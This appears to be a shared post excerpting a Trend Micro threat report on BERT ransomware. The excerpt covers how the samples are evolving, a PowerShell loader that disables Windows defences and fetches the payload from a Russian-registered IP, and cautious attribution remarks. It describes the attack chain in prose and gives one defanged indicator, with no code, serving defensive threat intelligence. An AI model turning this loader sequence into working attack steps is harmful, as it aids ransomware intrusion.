-
20,004
Abibisika (Black Gold) Points
Activity observed in the wild – TODAY
BERT ransomware payload (payload.exe).
During our pivoting efforts, we identified additional samples uploaded in the wild. Analysis revealed that these samples are older versions, lacking the updated encryption methods and function sequences seen in samples from our internal telemetry. These differences indicate that the threat actors are actively developing and refining the ransomware.
Over the course of our investigation, we found a PowerShell script (start.ps1) that functions as a loader for the BERT ransomware payload (payload.exe). The script escalates privileges, disables Windows Defender, the firewall, and user account control (UAC), then downloads and executes the ransomware from the remote IP address 185[.]100[.]157[.]74. The exact initial access method remains unclear.
Interestingly, the mentioned IP address is associated with ASN 39134, which is registered in Russia. While this alone does not establish attribution, the use of Russian infrastructure may indicate a potential connection to threat actors operating in or associated with the region. Notably, start.ps1 acts as the initial execution point for the ransomware.
trendmicro.com
BERT Ransomware Group Targets Asia and Europe on Multiple Platforms
BERT is a newly emerged ransomware group that pairs simple code with effective execution—carrying out attacks across Europe and Asia. In this entry, we examine the group’s tactics, how their variants have evolved, and the tools they use to get … Continue reading
